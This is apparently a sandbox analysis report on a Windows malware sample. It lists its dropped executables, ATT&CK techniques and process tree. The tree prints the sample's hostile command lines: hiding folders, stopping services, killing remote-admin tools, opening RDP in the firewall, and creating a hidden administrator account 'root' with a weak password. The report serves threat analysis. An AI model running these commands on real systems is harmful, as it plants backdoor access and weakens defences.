63c2b97943d4609a3e654321d97a0eaa5aadb74326223aa2ec2055db7e8f2a0c

Analysis

max time kernel
193s
max time network
220s
platform
windows10-2004_x64
resource
win10v2004-20220331-en
submitted
27-03-2022 10:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

63c2b97943d4609a3e654321d97a0eaa5aadb74326223aa2ec2055db7e8f2a0c.exe
Size

7.1MB
MD5

40c58d96efae59916aa70e2bc40dc077
SHA1

8d278b36668194c76e8b921ea87cc605aa956be9
SHA256

63c2b97943d4609a3e654321d97a0eaa5aadb74326223aa2ec2055db7e8f2a0c
SHA512

bf4310956379b323eef9ee51a9030d76905f08d172585a7dc76fd86a666c806ec06c79a5f28a2ea74ac7fbd2161fcb4ebd5c9416291c72e67d31beeaa32fb533

Score

8^/10

discovery evasion

Malware Config

Signatures

Executes dropped EXE 18 IoCs

pid	Process
3544	WinDevInstall.exe
4664	start1.exe
4580	start.exe
2552	Builder.exe
2320	Builder2.exe
2832	WinUpdate.exe
1052	RDP.exe
3828	RDPWrapper_run.exe
4900	RDPWrapper.exe
4616	WinUpdate1.exe
3596	run.exe
4812	CDevice.exe
1916	CDevice.exe
1608	CDevice.exe
4424	CDevice.exe
2096	RDPWInst.exe
4440	sysdevices.exe
3172	sysdevices.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-157025953-3125636059-437143553-1000\Control Panel\International\Geo\Nation	start.exe
Key value queried	\REGISTRY\USER\S-1-5-21-157025953-3125636059-437143553-1000\Control Panel\International\Geo\Nation	RDPWrapper_run.exe
Key value queried	\REGISTRY\USER\S-1-5-21-157025953-3125636059-437143553-1000\Control Panel\International\Geo\Nation	WinUpdate.exe
Key value queried	\REGISTRY\USER\S-1-5-21-157025953-3125636059-437143553-1000\Control Panel\International\Geo\Nation	WinUpdate1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-157025953-3125636059-437143553-1000\Control Panel\International\Geo\Nation	RDPWrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-157025953-3125636059-437143553-1000\Control Panel\International\Geo\Nation	63c2b97943d4609a3e654321d97a0eaa5aadb74326223aa2ec2055db7e8f2a0c.exe
Key value queried	\REGISTRY\USER\S-1-5-21-157025953-3125636059-437143553-1000\Control Panel\International\Geo\Nation	WinDevInstall.exe
Key value queried	\REGISTRY\USER\S-1-5-21-157025953-3125636059-437143553-1000\Control Panel\International\Geo\Nation	run.exe
Key value queried	\REGISTRY\USER\S-1-5-21-157025953-3125636059-437143553-1000\Control Panel\International\Geo\Nation	start1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-157025953-3125636059-437143553-1000\Control Panel\International\Geo\Nation	RDP.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 2 IoCs

evasion

pid	Process
3268	taskkill.exe
4480	taskkill.exe

Runs .reg file with regedit 2 IoCs

pid	Process
4268	regedit.exe
1576	regedit.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
4812	CDevice.exe
4812	CDevice.exe
4812	CDevice.exe
4812	CDevice.exe
4812	CDevice.exe
4812	CDevice.exe
1916	CDevice.exe
1916	CDevice.exe
1608	CDevice.exe
1608	CDevice.exe
4424	CDevice.exe
4424	CDevice.exe
4424	CDevice.exe
4424	CDevice.exe
4424	CDevice.exe
4424	CDevice.exe
4440	sysdevices.exe
4440	sysdevices.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	3268	taskkill.exe
Token: SeDebugPrivilege	4480	taskkill.exe
Token: SeDebugPrivilege	4812	CDevice.exe
Token: SeDebugPrivilege	1608	CDevice.exe
Token: SeTakeOwnershipPrivilege	4424	CDevice.exe
Token: SeTcbPrivilege	4424	CDevice.exe
Token: SeTcbPrivilege	4424	CDevice.exe

Suspicious use of SetWindowsHookEx 20 IoCs

pid	Process
4664	start1.exe
4580	start.exe
2552	Builder.exe
2320	Builder2.exe
2832	WinUpdate.exe
1052	RDP.exe
3828	RDPWrapper_run.exe
4900	RDPWrapper.exe
4616	WinUpdate1.exe
5096	cmd.exe
3596	run.exe
928	cmd.exe
4812	CDevice.exe
4812	CDevice.exe
1916	CDevice.exe
1916	CDevice.exe
1608	CDevice.exe
1608	CDevice.exe
4424	CDevice.exe
2096	RDPWInst.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4796 wrote to memory of 3544	4796	63c2b97943d4609a3e654321d97a0eaa5aadb74326223aa2ec2055db7e8f2a0c.exe	81
PID 4796 wrote to memory of 3544	4796	63c2b97943d4609a3e654321d97a0eaa5aadb74326223aa2ec2055db7e8f2a0c.exe	81
PID 4796 wrote to memory of 3544	4796	63c2b97943d4609a3e654321d97a0eaa5aadb74326223aa2ec2055db7e8f2a0c.exe	81
PID 3544 wrote to memory of 4664	3544	WinDevInstall.exe	83
PID 3544 wrote to memory of 4664	3544	WinDevInstall.exe	83
PID 3544 wrote to memory of 4664	3544	WinDevInstall.exe	83
PID 4664 wrote to memory of 4580	4664	start1.exe	85
PID 4664 wrote to memory of 4580	4664	start1.exe	85
PID 4664 wrote to memory of 4580	4664	start1.exe	85
PID 4580 wrote to memory of 2552	4580	start.exe	86
PID 4580 wrote to memory of 2552	4580	start.exe	86
PID 4580 wrote to memory of 2552	4580	start.exe	86
PID 4580 wrote to memory of 2320	4580	start.exe	87
PID 4580 wrote to memory of 2320	4580	start.exe	87
PID 4580 wrote to memory of 2320	4580	start.exe	87
PID 4580 wrote to memory of 2832	4580	start.exe	88
PID 4580 wrote to memory of 2832	4580	start.exe	88
PID 4580 wrote to memory of 2832	4580	start.exe	88
PID 4580 wrote to memory of 1052	4580	start.exe	89
PID 4580 wrote to memory of 1052	4580	start.exe	89
PID 4580 wrote to memory of 1052	4580	start.exe	89
PID 1052 wrote to memory of 3828	1052	RDP.exe	90
PID 1052 wrote to memory of 3828	1052	RDP.exe	90
PID 1052 wrote to memory of 3828	1052	RDP.exe	90
PID 3828 wrote to memory of 4900	3828	RDPWrapper_run.exe	91
PID 3828 wrote to memory of 4900	3828	RDPWrapper_run.exe	91
PID 3828 wrote to memory of 4900	3828	RDPWrapper_run.exe	91
PID 2832 wrote to memory of 4616	2832	WinUpdate.exe	93
PID 2832 wrote to memory of 4616	2832	WinUpdate.exe	93
PID 2832 wrote to memory of 4616	2832	WinUpdate.exe	93
PID 4616 wrote to memory of 5096	4616	WinUpdate1.exe	94
PID 4616 wrote to memory of 5096	4616	WinUpdate1.exe	94
PID 4616 wrote to memory of 5096	4616	WinUpdate1.exe	94
PID 5096 wrote to memory of 3916	5096	cmd.exe	96
PID 5096 wrote to memory of 3916	5096	cmd.exe	96
PID 5096 wrote to memory of 3916	5096	cmd.exe	96
PID 4900 wrote to memory of 3596	4900	RDPWrapper.exe	97
PID 4900 wrote to memory of 3596	4900	RDPWrapper.exe	97
PID 4900 wrote to memory of 3596	4900	RDPWrapper.exe	97
PID 5096 wrote to memory of 5072	5096	cmd.exe	120
PID 5096 wrote to memory of 5072	5096	cmd.exe	120
PID 5096 wrote to memory of 5072	5096	cmd.exe	120
PID 5096 wrote to memory of 2784	5096	cmd.exe	119
PID 5096 wrote to memory of 2784	5096	cmd.exe	119
PID 5096 wrote to memory of 2784	5096	cmd.exe	119
PID 3596 wrote to memory of 928	3596	run.exe	98
PID 3596 wrote to memory of 928	3596	run.exe	98
PID 3596 wrote to memory of 928	3596	run.exe	98
PID 5096 wrote to memory of 2560	5096	cmd.exe	116
PID 5096 wrote to memory of 2560	5096	cmd.exe	116
PID 5096 wrote to memory of 2560	5096	cmd.exe	116
PID 5096 wrote to memory of 2008	5096	cmd.exe	99
PID 5096 wrote to memory of 2008	5096	cmd.exe	99
PID 5096 wrote to memory of 2008	5096	cmd.exe	99
PID 5096 wrote to memory of 2368	5096	cmd.exe	115
PID 5096 wrote to memory of 2368	5096	cmd.exe	115
PID 5096 wrote to memory of 2368	5096	cmd.exe	115
PID 5096 wrote to memory of 2336	5096	cmd.exe	113
PID 5096 wrote to memory of 2336	5096	cmd.exe	113
PID 5096 wrote to memory of 2336	5096	cmd.exe	113
PID 5096 wrote to memory of 4456	5096	cmd.exe	111
PID 5096 wrote to memory of 4456	5096	cmd.exe	111
PID 5096 wrote to memory of 4456	5096	cmd.exe	111
PID 928 wrote to memory of 1588	928	cmd.exe	110

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3916	attrib.exe
4908	attrib.exe

C:\Users\Admin\AppData\Local\Temp\63c2b97943d4609a3e654321d97a0eaa5aadb74326223aa2ec2055db7e8f2a0c.exe
"C:\Users\Admin\AppData\Local\Temp\63c2b97943d4609a3e654321d97a0eaa5aadb74326223aa2ec2055db7e8f2a0c.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4796
- C:\ProgramData\CardWindows\WinDevInstall.exe
  "C:\ProgramData\CardWindows\WinDevInstall.exe" -p7832489354378589235643543456
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3544
- - C:\ProgramData\CardWindows\start1.exe
    "C:\ProgramData\CardWindows\start1.exe"
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4664
  - - C:\ProgramData\CardWindows\start.exe
      "C:\ProgramData\CardWindows\start.exe"
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4580
    - - C:\ProgramData\CardWindows\Builder.exe
        
        "C:\ProgramData\CardWindows\Builder.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2552
    - - C:\ProgramData\CardWindows\Builder2.exe
        
        "C:\ProgramData\CardWindows\Builder2.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2320
    - - C:\ProgramData\CardWindows\WinUpdate.exe
        
        "C:\ProgramData\CardWindows\WinUpdate.exe" -p5387687645378674524512345389721228
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2832
      - C:\ProgramData\CardWindows\WinUpdate1.exe
        
        "C:\ProgramData\CardWindows\WinUpdate1.exe"
        6⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4616
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\CardWindows\SysInstall.bat" "
        7⤵
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:5096
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\ProgramData\CardWindows"
        8⤵
        Views/modifies file attributes
        
        PID:3916
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop ServiceWork
        8⤵
        
        PID:2008
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete VDeviceCard
        8⤵
        
        PID:5060
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete ServiceWork
        8⤵
        
        PID:944
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im rfusclient.exe /f
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3268
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete AMIHardware
        8⤵
        
        PID:4116
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete IntelDriver
        8⤵
        
        PID:4628
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete NPackStereo
        8⤵
        
        PID:436
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im rutserv.exe /f
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4480
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete RManService
        8⤵
        
        PID:4456
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\SYSTEM\Nvidia\Toolbar\DeviceCard" /f
        8⤵
        
        PID:4180
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop AMIHardware
        8⤵
        
        PID:2336
        
        C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "C:\ProgramData\CardWindows\config_set.reg"
        8⤵
        Runs .reg file with regedit
        
        PID:4268
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop IntelDriver
        8⤵
        
        PID:2368
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop NPackStereo
        8⤵
        
        PID:2560
        
        C:\ProgramData\CardWindows\CDevice.exe
        
        "C:\ProgramData\CardWindows\CDevice.exe" /silentinstall
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4812
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop VDeviceCard
        8⤵
        
        PID:2784
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop RManService
        8⤵
        
        PID:5072
        
        C:\ProgramData\CardWindows\CDevice.exe
        
        "C:\ProgramData\CardWindows\CDevice.exe" /firewall
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1916
        
        C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "C:\ProgramData\CardWindows\config_set.reg"
        8⤵
        Runs .reg file with regedit
        
        PID:1576
        
        C:\Windows\SysWOW64\sc.exe
        
        sc failure VDeviceCard reset= 0 actions= restart/500/restart/500/restart/500
        8⤵
        
        PID:5088
        
        C:\Windows\SysWOW64\sc.exe
        
        sc config VDeviceCard obj= LocalSystem type= interact type= own
        8⤵
        
        PID:1568
        
        C:\ProgramData\CardWindows\CDevice.exe
        
        "C:\ProgramData\CardWindows\CDevice.exe" /start
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:1608
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\ProgramData\CardWindows\*.*"
        8⤵
        Views/modifies file attributes
        
        PID:4908
    - - C:\ProgramData\CardWindows\RDP.exe
        
        "C:\ProgramData\CardWindows\RDP.exe"
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1052
      - C:\ProgramData\RDP\RDPWrapper_run.exe
        
        "C:\ProgramData\RDP\RDPWrapper_run.exe"
        6⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3828
        
        C:\ProgramData\RDP\RDPWrapper.exe
        
        "C:\ProgramData\RDP\RDPWrapper.exe" -p27852786784527827414245258638727424524124452741245527212
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4900
        
        C:\ProgramData\RDP\run.exe
        
        "C:\ProgramData\RDP\run.exe"
        8⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3596
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\RDP\run.bat" "
        9⤵
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:928
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        10⤵
        
        PID:912
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
        10⤵
        
        PID:1768
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
        10⤵
        
        PID:1588
        
        C:\Windows\SysWOW64\net.exe
        
        net user root /add
        10⤵
        
        PID:3496
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user root /add
        11⤵
        
        PID:2828
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup Çñ¼¿¡¿ßΓαáΓ«αδ root /add
        10⤵
        
        PID:1808
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Çñ¼¿¡¿ßΓαáΓ«αδ root /add
        11⤵
        
        PID:1804
        
        C:\Windows\SysWOW64\net.exe
        
        net user root 12345
        10⤵
        
        PID:2168
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v root /t REG_DWORD /d 0 /f
        10⤵
        
        PID:4904
        
        C:\ProgramData\RDP\RDPWInst.exe
        
        "C:\ProgramData\RDP\RDPWInst.exe" -i -o
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2096

C:\ProgramData\CardWindows\CDevice.exe
C:\ProgramData\CardWindows\CDevice.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4424
- C:\ProgramData\CardWindows\sysdevices.exe
  C:\ProgramData\CardWindows\sysdevices.exe /tray
  2⤵
  - Executes dropped EXE
  PID:3172
- C:\ProgramData\CardWindows\sysdevices.exe
  C:\ProgramData\CardWindows\sysdevices.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:4440

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user root 12345
1⤵
PID:3644

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\CardWindows\Builder.exe

Filesize
997KB

MD5
2f92eed4e2061af0961f379e9ded70d6

SHA1
8b58dcd428759d3633a14bcfc62a8cb6deb66de5

SHA256
52cad2ada36a7a4b8d5e653cfe1854d32210ef198561e4cf53ea1c4e5ebbb84f

SHA512
909561ad25f5a4af7360004a6b259bdb70dfad4ced7fe0f39a72ed61f421bc943dce9c7215634ed12284811f36d9a5bae8d1f439412a94bbbd4c24cb4f4962ac

Download Submit
C:\ProgramData\CardWindows\Builder.exe

Filesize
997KB

MD5
2f92eed4e2061af0961f379e9ded70d6

SHA1
8b58dcd428759d3633a14bcfc62a8cb6deb66de5

SHA256
52cad2ada36a7a4b8d5e653cfe1854d32210ef198561e4cf53ea1c4e5ebbb84f

SHA512
909561ad25f5a4af7360004a6b259bdb70dfad4ced7fe0f39a72ed61f421bc943dce9c7215634ed12284811f36d9a5bae8d1f439412a94bbbd4c24cb4f4962ac

Download Submit
C:\ProgramData\CardWindows\Builder2.exe

Filesize
368KB

MD5
5bc1cdb63ab6345843d7254ee51eb3cd

SHA1
54b5ec6185bbb3d33c17fd24c6143cf9372168b2

SHA256
5e0c07ccca39ab7e0d5a59d7f71b79a6c786a9ef65e3c53f1934016bf490d2ae

SHA512
6768769a22e4075eb3c2bbe8784e3eea79f0d2b709f43627742adc9b6610ed0f3d4f7327e6d10f898f68e7bf808c540c76ae2098b803ff784a829066151b980d

Download Submit
C:\ProgramData\CardWindows\Builder2.exe

Filesize
368KB

MD5
5bc1cdb63ab6345843d7254ee51eb3cd

SHA1
54b5ec6185bbb3d33c17fd24c6143cf9372168b2

SHA256
5e0c07ccca39ab7e0d5a59d7f71b79a6c786a9ef65e3c53f1934016bf490d2ae

SHA512
6768769a22e4075eb3c2bbe8784e3eea79f0d2b709f43627742adc9b6610ed0f3d4f7327e6d10f898f68e7bf808c540c76ae2098b803ff784a829066151b980d

Download Submit
C:\ProgramData\CardWindows\CDevice.exe

Filesize
6.0MB

MD5
60478b65ab22e759c71f1923edb1bbab

SHA1
4268fc2bf9ff27ec280416b12bb0de96e9ae718d

SHA256
047274a242de93573a5f83fb152554a68dfa12ac877f5f9919dec5e62b70ada0

SHA512
2921917b17de2ef41e10619d86a5a4a34fe9da8d05870135781342a7c6b171827e868f351d9961fa4844bb37a29ab2278d6d38ce231022f820a7310e97669580

Download Submit
C:\ProgramData\CardWindows\CDevice.exe

Filesize
6.0MB

MD5
60478b65ab22e759c71f1923edb1bbab

SHA1
4268fc2bf9ff27ec280416b12bb0de96e9ae718d

SHA256
047274a242de93573a5f83fb152554a68dfa12ac877f5f9919dec5e62b70ada0

SHA512
2921917b17de2ef41e10619d86a5a4a34fe9da8d05870135781342a7c6b171827e868f351d9961fa4844bb37a29ab2278d6d38ce231022f820a7310e97669580

Download Submit
C:\ProgramData\CardWindows\CDevice.exe

Filesize
6.0MB

MD5
60478b65ab22e759c71f1923edb1bbab

SHA1
4268fc2bf9ff27ec280416b12bb0de96e9ae718d

SHA256
047274a242de93573a5f83fb152554a68dfa12ac877f5f9919dec5e62b70ada0

SHA512
2921917b17de2ef41e10619d86a5a4a34fe9da8d05870135781342a7c6b171827e868f351d9961fa4844bb37a29ab2278d6d38ce231022f820a7310e97669580

Download Submit
C:\ProgramData\CardWindows\CDevice.exe

Filesize
6.0MB

MD5
60478b65ab22e759c71f1923edb1bbab

SHA1
4268fc2bf9ff27ec280416b12bb0de96e9ae718d

SHA256
047274a242de93573a5f83fb152554a68dfa12ac877f5f9919dec5e62b70ada0

SHA512
2921917b17de2ef41e10619d86a5a4a34fe9da8d05870135781342a7c6b171827e868f351d9961fa4844bb37a29ab2278d6d38ce231022f820a7310e97669580

Download Submit
C:\ProgramData\CardWindows\CDevice.exe

Filesize
6.0MB

MD5
60478b65ab22e759c71f1923edb1bbab

SHA1
4268fc2bf9ff27ec280416b12bb0de96e9ae718d

SHA256
047274a242de93573a5f83fb152554a68dfa12ac877f5f9919dec5e62b70ada0

SHA512
2921917b17de2ef41e10619d86a5a4a34fe9da8d05870135781342a7c6b171827e868f351d9961fa4844bb37a29ab2278d6d38ce231022f820a7310e97669580

Download Submit
C:\ProgramData\CardWindows\RDP.exe

Filesize
1.8MB

MD5
06500c519e9a20c6851d55e4ec6a1bff

SHA1
d09baa50160cd02e31f3f617ea24e1f655dd67cb

SHA256
3a427942a462adc64695f62480b63470edef3e46599442e6fb517397967475d0

SHA512
217ff7685d97c6563a57497620cfa33e21683ec963c69b77054d04a339ffddd198e0835e73f2cce1606ce860f91feb1463ced22b392049d1b693e471d30bcec8

Download Submit
C:\ProgramData\CardWindows\RDP.exe

Filesize
1.8MB

MD5
06500c519e9a20c6851d55e4ec6a1bff

SHA1
d09baa50160cd02e31f3f617ea24e1f655dd67cb

SHA256
3a427942a462adc64695f62480b63470edef3e46599442e6fb517397967475d0

SHA512
217ff7685d97c6563a57497620cfa33e21683ec963c69b77054d04a339ffddd198e0835e73f2cce1606ce860f91feb1463ced22b392049d1b693e471d30bcec8

Download Submit
C:\ProgramData\CardWindows\Russian.lg

Filesize
48KB

MD5
e44e34bc285b709f08f967325d9c8be1

SHA1
e73f05c6a980ec9d006930c5343955f89579b409

SHA256
1d99a7b5f7b3daa61fa773972b1e335aa09b92411484f6ddc99d2b2894455a5b

SHA512
576b292b6e9cf022822443e050994462a6cbd9a3c60063bae9f54c78a84e75e17bb5eddf7e259a22a9d93f757cb6536c503762e2a30e75091e40c2756cde8727

Download Submit
C:\ProgramData\CardWindows\SysInstall.bat

Filesize
1KB

MD5
a00d1b7d978dcd3728e14c3f0e2386df

SHA1
596deee85bd6521c9d3fb7ffe3654aa0b386e9ed

SHA256
00baf3f49d72d9ae56cd5dbfbcd0a3a87b88ae3e768cbfe8a77769fd443a1cd5

SHA512
fe8a3752ba3bfddeb979f0a3cb8787218525057b873481f24169c6629851f862059ceb1cc52ed03f6b1bea87866833a107226b6a1a5ab969b959de0d56987c80

Download Submit
C:\ProgramData\CardWindows\SysInstall2.bat

Filesize
269B

MD5
ad964d1f40f1ab48e26d9ff0bdc01d06

SHA1
073396d19000036396005d9ebf89f40fb481e1e5

SHA256
632b75ab4857c964f8cf1f61efeff7a1bc7583fca3e9fbef9bca768ee227b9ff

SHA512
f671e8bcb42f757d5384c8be7bde6abe18a1196834948ded0634152c4ef0608c972be417082035b7640178d26810fe8dc25b128c1e18d1d343e1b9f9c475d255

Download Submit
C:\ProgramData\CardWindows\SystemCard.dat

Filesize
647B

MD5
2db0f5ade581516ccd80880197a007ff

SHA1
9dd8379da351d1c8361169d0548a25ad13c14973

SHA256
9b0e0a3cd2e3694bfa85335d8ec3b59a6e92bd37592604a65e32b310b61458d3

SHA512
8fffa0271c81cfd37194e2b405c2b35e949b08eec08e93be5b49d268d9ec4b58aaa9c5038b316589c5ac6444fb969b37a17c71ed8b1665dc3ca56f30b857c103

Download Submit
C:\ProgramData\CardWindows\WinDevInstall.exe

Filesize
6.5MB

MD5
ff45bfaab4ba3c580e91c4c23b6084cc

SHA1
bbcb6a4f8c1c5497e0af0634bc11f7fc3d552515

SHA256
edfa3acae5def78b893e14b977d9dc3b80d245047538b42bc9ededebe85e9e4c

SHA512
fb17e0ccca35848945fff3ba6418167dda3afe15919517169483bd26018bcddc272e448aa2e93cdbf6534b4a0a3288f326c7d394f6b6c74d4bb2e19217a022b0

Download Submit
C:\ProgramData\CardWindows\WinDevInstall.exe

Filesize
6.5MB

MD5
ff45bfaab4ba3c580e91c4c23b6084cc

SHA1
bbcb6a4f8c1c5497e0af0634bc11f7fc3d552515

SHA256
edfa3acae5def78b893e14b977d9dc3b80d245047538b42bc9ededebe85e9e4c

SHA512
fb17e0ccca35848945fff3ba6418167dda3afe15919517169483bd26018bcddc272e448aa2e93cdbf6534b4a0a3288f326c7d394f6b6c74d4bb2e19217a022b0

Download Submit
C:\ProgramData\CardWindows\WinUpdate.exe

Filesize
4.3MB

MD5
436658cb9c13960ecdb332ec02cc1388

SHA1
33c6b18a1a0ef78fbc9496893dd32bbce7fd47ff

SHA256
ba83d27a14161c57f58bed535843fc3cd64b39853e787b01e73517360e9923a7

SHA512
231b82bb53ef894b1907a0c644dc9ec7a6267783193310f97200be37beb1805462fa834bc7e46b7e3c03e149602169373549c6e937744e9fdd9e56a34e731ab4

Download Submit
C:\ProgramData\CardWindows\WinUpdate.exe

Filesize
4.3MB

MD5
436658cb9c13960ecdb332ec02cc1388

SHA1
33c6b18a1a0ef78fbc9496893dd32bbce7fd47ff

SHA256
ba83d27a14161c57f58bed535843fc3cd64b39853e787b01e73517360e9923a7

SHA512
231b82bb53ef894b1907a0c644dc9ec7a6267783193310f97200be37beb1805462fa834bc7e46b7e3c03e149602169373549c6e937744e9fdd9e56a34e731ab4

Download Submit
C:\ProgramData\CardWindows\WinUpdate1.exe

Filesize
379KB

MD5
a36f89d64e0de0fe14ba911713df29eb

SHA1
7d700fa255f32aa37b82dc59826cf35300b250d4

SHA256
d1deecb8f672e32316a71444f1500be8381f64741445f138704876274e131a1c

SHA512
55ac398815ce5e00e18a839f0d12984488e6ee4e1eb69396a6bc01e12a86bc3256308f164cd52d5b6c733c77cb18f008a03921c831c62fd0d4d0a7b7184a6e57

Download Submit
C:\ProgramData\CardWindows\WinUpdate1.exe

Filesize
379KB

MD5
a36f89d64e0de0fe14ba911713df29eb

SHA1
7d700fa255f32aa37b82dc59826cf35300b250d4

SHA256
d1deecb8f672e32316a71444f1500be8381f64741445f138704876274e131a1c

SHA512
55ac398815ce5e00e18a839f0d12984488e6ee4e1eb69396a6bc01e12a86bc3256308f164cd52d5b6c733c77cb18f008a03921c831c62fd0d4d0a7b7184a6e57

Download Submit
C:\ProgramData\CardWindows\config_set.reg

Filesize
11KB

MD5
864e25c17d596e0baf577189a9cf0295

SHA1
94e915da3e683faf54945b86939d2bfb2abd70c5

SHA256
79ab503fa5c9a7e128f50c07e0dd1e1c078a0034d01956267f0040edae0295a5

SHA512
d37489135043adf202be19df80c36c7429e7e00e9f39ec580063cc949390192b1ca494a7bee7b8aef4b0a2d205ea143b4c31ac9a6c9e1fe76d055bf8ddb84da5

Download Submit
C:\ProgramData\CardWindows\start.exe

Filesize
394KB

MD5
e58793d6f2eb99a540797b64fa11a9e3

SHA1
b3638113405efc8eadc7d7638d6d47f5319cf811

SHA256
1a978563255ada2ee332405f2a553842e131475f06e6dfaa38166358bbd9683b

SHA512
05f372d2b97764745922d0a4ad908d8ae0b439109e3702824cc162ed0b4f1347381481469943f5521a8bf90471e1cbc2fad088bf33a4ea8224c187b1f8a8ec22

Download Submit
C:\ProgramData\CardWindows\start.exe

Filesize
394KB

MD5
e58793d6f2eb99a540797b64fa11a9e3

SHA1
